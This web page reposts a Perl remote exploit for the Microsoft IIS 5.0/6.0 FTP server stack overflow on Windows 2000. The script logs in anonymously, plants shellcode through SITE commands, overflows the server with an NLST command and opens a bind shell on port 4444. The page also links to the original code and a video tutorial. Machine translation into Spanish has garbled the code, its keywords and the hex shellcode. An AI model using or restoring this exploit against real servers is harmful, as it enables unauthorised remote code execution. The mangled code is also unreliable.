Microsoft IIS 5.0/6.0 servidor FTP remoto de desbordamiento de pila Exploit (win2k)

Microsoft IIS 5.0/6.0 servidor FTP remoto de desbordamiento de pila Exploit (win2k): "

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143

#! / Usr / bin / perl # IIS 5.0 Servidor FTP / sistemas remotos explotar # De Win2k SP4 objetivos bug # encontrado y explotado por Kingcope, kcope2 <at> googlemail.com # Afecta IIS6 con pila de protección de cookie # Modded por muts, egghunter añadido adicional para ampliar la carga secundaria # ¿Podría tomar un minuto o dos para que el huevo se encuentra. # Abre una shell se unen en el puerto 4444 http://www.offensive-security.com/0day/msftp.pl.txt # IO uso:: Socket; $ | = 1; sc = "\ x 89 \ x e2 \ x dd x \ c5 \ x d9 \ x 72 x \ f4 \ x 5f \ x 57 \ $ x 59 \ x 49 \ x 49 \ x 49 \ x 49 \ x 43" . "\ X 43 \ x 43 \ x 43 \ x 43 \ x 43 \ x 51 \ x 5 bis \ x 56 \ x 54 \ x 58 x \ 33 \ 30 x \ x 56 \ x 58 \ x 34". "\ X 41 x \ 50 \ 30 x \ x 41 x \ 33 \ x 48 \ x 48 \ x 30 \ x 41 \ x 30 \ x 30 \ x 41 \ x 42 \ x 41 \ x 41". "\ X 42 \ x 54 \ x 41 \ x 41 \ x 51 x \ 32 \ 41 x \ x 42 x \ 32 \ x 42 \ x 42 \ x 30 \ x 42 \ x 42 \ x 58". "\ X 50 \ x 38 \ x 41 \ x 43 \ x 4 bis \ x 4 bis \ x 49 \ x 45 \ x 36 \ x 4d \ x 51 \ x 48 \ x 4 bis \ x 4 ter \ x 4f". "\ X 44 x \ 4f \ x 47 x \ 32 \ 46 x \ x 32 \ x 42 \ x 4 bis \ x 43 x \ 32 \ 46 x \ x 38 \ x 48 \ x 4d \ x 46". "\ X 4e \ x 47 \ 4c x \ x 45 \ x 55 \ x 51 \ x 4 bis \ x 44 \ x 34 \ x 4 bis \ 4f x \ x 48 \ x 38 \ x 46 \ x 34". "\ X 50 x \ 30 \ 46 x \ x 50 \ x 50 \ x 57 \ 4c x \ x 4 ter \ x 4 ter \ x 4 bis \ 4e x \ x 4f \ x 44 x \ 35 \ x 4 bis". "\ X 4 bis \ 4e x \ x 4f \ x 43 \ x 45 \ x 4 ter \ x 57 \ x 4 ter \ 4f x \ x 4d \ x 37 \ x 41 \ x 41"; #. / Ventanas msfpayload / shell_bind_tcp R |. / Msfencode-e x86/shikata_ga_nai-b "\ x00 x0a \ \ x0d" shell $ = "T00WT00W". "\ x \ x da de \ x bd \ x 2d \ e7 x \ x 9 ter \ x 9f \ x 2b \ c9 x \ x b1 \ x 56 \ x d9 \ x 74 \" x 24 " \ f4 x ". "\ X 5 bis \ x 83 \ / u. x \ fc \ x 31 x \ x 6 bis \ x 15 x \ 03 \ x 6 bis \ x 15 \ x cf \ x 12 \ x 67 \ x 77 \ x 86". "\ Dd \ x 98 x \ x 88 \ x f8 \ x 54 \ x 7 D \ x b9 \ x 2a \ x 02 x \ f5 \ e8 x \ x fa \ x 40 \ x 5b \ x 01". "\ X 71 \ x 04 \ x 48 \ x 92 x \ f7 \ x 81 \ x 7f \ x 13 \ x \ bd f7 x \ x 4e \ x a4 \ x 70 \ x 38 \ x 1c". "\ X 66 \ x 13 \ x c4 \ x 5f \ x \ x bb f3 \ f5 x \ x \ af ce x \ x f2 \ x 32 \ x \ x 21 cd \ x a6 \ x" e ter. "\ X 99 x \ 90 \ x 56 \ x 9f \ cc x \ x 28 \ x 57 x \ 4f \ 6b x \ x 10 \ x 2 septies \ / u. x \ ca \ x x e5 \ x 85". "\ F5 x \ x fc \ x 56 \ x 92 \ x ser \ x e4 \ x \ dd x fc x \ 1e \ x 14 \ x 31 \ x 1F \ x 62 \ x 5f \ x 3e". "X x \ eb 10 \ x 5e \ x 96 x \ 22 \ x d8 \ x 50 \ x d6 \ e8 x \ x e7 \ 5c x \ x db \ \ f1 x \ x 20 \ x 5 bis". "\ X 04 \ x 84 \ x 5 bis \ x 98 \ x b9 \ x 9e \ x 98 \ x e2 \ x 65 \ x 2b \ x 3d \ x 44 \ x \ ed x 8 B \ x e5". "\ X 74 x \ 22 \ x 4d \ x 6d \ x 7 \ x 8f \ x 1a \ x 29 \ x 9f \ x 0e \ cf x \ x 41 \ x 9 ter \ x 9 ter \ x" ee. "\ X 85 \ x 2d \ x df \ d4 x \ x 01 \ x 75 \ x \ bb x 75 \ x 13 \ x d3 \ x 6 bis \ x 8 \ x 43 \ x \ bb x d3". "\ 2e x \ x 0f \ 2e x \ x 07 \ x 48 x \ 52 \ x 27 \ x e4 \ x 66 \ x 6d \ b7 x \ x 62 \ f1 x \ x 1e \ x 85". "\ X 2d \ a9 x \ 88 x \ x a5 \ x a6 \ x 77 \ x 4e \ c9 x \ 9 quater, x \ x cf \ x c0 \ x 34 \ x 1F \ x 2 septies \ x c8". "\ X f2 \ x 4 ter \ x 7f \ x 62 x \ d2 \ f3 x \ x 14 \ x 72 \ x \ db x 21 \ x ba \ x 22 \ x 73 \ x 9 \ x 7". "\ X 93 x \ 33 \ x 4 bis \ x 12 \ x f9 \ x \ x bb b5 \ x 02 \ x 02 \" x 16 \ x c0 \ x 05 x \ cc \ x 42 \ x 80 ". "\ X e1 \ x 2d \ x 75 \ x 36 \ x ad \ x b8 \ x 93 x \ 52 \ x 5d \ x \ x 0c ed \ x \ x ter 9f \ x ca \ x 84". "\ X 6c \ x e0 \ x 38 \ x b9 \ x 25 \ x 76 \ x 74 \ x d7 \ x f2 \ x 79 \ x 85 \ x \ fd x 50 \ x d6 \ x 2d". "\ X 96 x \ 22 \ x 34 \ / u. x \ x 87 \ x 34 x \ 11 \ x 5 bis \ c1 x \ x 0c \ f1 x \ x 10 \ x \ bf x df \ x 60". "\ X 24 \ / u. x \ x 88 x \ 01 \ x b7 \ x 71 \ x 49 \ 4c x \ x a4 \ x 2d \ x 1e \ x 19 \ x 1a \ x 24 \ x ca". "\ X b7 \ x 05 \ x 9e \ x e9 \ x 4 bis \ x d3 \ x d9 \ aa x \ x 90 \" x 20 \ e7 x \ x 33 \ x 55 \ x 1c \ x c3 ". "\ X 23 \ x a3 \ x 9d \ 4f x \ x 10 \ x 7b \ c8 x \ x 19 x \ ce \ x \ 3d x a2 \ eb x \ x b8 \ x 97 \ x 19". "A2 x \ x 2c \ 6e x \ x 52 \ x 75 \ x 2b \ x 6f \ x \ bf x 03 \ x d3 \ c1 x \ x 16 x \ 52 \ eb x x \ ed \". "\ X fe \ x 52 \ x 94 x \ 10 \ x 9f \ x 9d \ 4f x \ x 91 \ x \ bf x \ x 5 bis 7f \ ef x \ x 57 \ x 26 \ x 0f". "\ X 52 \ x 3 bis \ x d9 \ x e5 \ x 90 \ x 43 \ x 5 bis \ 0c x \ x 68 \ b0 x \ x 42 \ x 65 \ x 6d \ x fc \ x c4". "\ X 95 \ x 1F \ x 6d \ x a1 \ x 99 \ x 8 C \ x 8e \ x e0 \ x 90"; print "IIS 5.0 FTPd / r00t remoto explotar por V1.2 kcope \ n"; if ($ # ARGV ne 1) ( print "Uso: <target> iiz5.pl <su ip> \ n local"; salida (0); ) srand (time ()); $ Puerto = int (rand (31,337 a 1022)) + 1025; locip $ = $ ARGV [1]; locip $ = ~ s / \. /, / gi; if (tenedor ()) ( calcetín $ = IO:: Socket:: INET -> new (PeerAddr => $ ARGV [0], PeerPort => "21", Proto = 'tcp>'); parche $ = "\ x 7E \ x F1 \ x \ x FA 7F"; # $ RetAddr = "\ x9B \ xB1 \ X4 \ X77"; # JMP ESP univ el 2 de win2k SP4 plataformas RetAddr $ = "\ \ 7B x x 30 \ x E4 \ x 77"; # JMP ESP univ el 2 de win2k SP4 + + de continuación con todos los parches $ v = "KSEXY". $ sc. "V" x (500 - Longitud ($ sc) - 5); # Dirección superior del marco de pila donde reside shellcode, está codificada dentro de este bloque $ Findsc = "\ x B8 \ x 55 \ x 55 x \ 52 \ x 55 x \ 35 \ x 55 \ x 55 \ x 55 \ x 55 x \ 40 \ x 81 \ x 38 \ x 53" . "\ X 45 \ x 58 \ x 59 \ x 75 \ x F7 \ x 40 x \ 40 \ x 40 x \ 40 \ x \ FF FF x \ x E0"; # ataque de amortiguamiento c = $ findsc. "C". ($ patch x (76 / 4)). $ $ patch. $ patch. ($ Patch x (52 / 4)). $ Patch. "EEEE $ RetAddr". $ Patch. "HHHHIIII". $ parche ". JKKK". "\ E9 x \ x 63 \ x FE \ FF x \ x FF \ FF x \ x FF". "NNNN"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "USUARIO anonimoos \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PASS $ shell \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "USUARIO anonimoos \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PASS $ shell \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "USER \ anónima r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "PASS \ anónima r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "w00t MKD $ port \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; # Almacenamos shellcode en memoria de proceso (de pila) $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "CWD w00t $ port \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "MKD CCC". "$ C \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PUERTO $ locip". Int ($ portuaria / 256). "". Int ($% puerto 256). "\ R \ n"; $ X = <> $ calcetín; print $ x; # TRIGGER print $ calcetín "NLST $ c */../ * C / r \ \ n"; $ X = <> $ calcetín; print $ x; while (1) () Else () my $ servsock = IO:: Socket:: INET -> new (localaddr => "0.0.0.0", LocalPort => $ puerto, => 'proto tcp', Escuche => 1); die "No se pudo crear el socket: $! \ n" a menos que $ servsock; mi new_sock $ = $ -> aceptar servsock (); while (<$ new_sock>) ( print $ _; ) cierre ($ servsock); ) Cheerio # # # Kingcope

代码地址: http://www.offensive-security.com/0day/msftp.pl.txt

利用教程: http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/microsoft-ftp-server-remote-exploit_controller.swf

"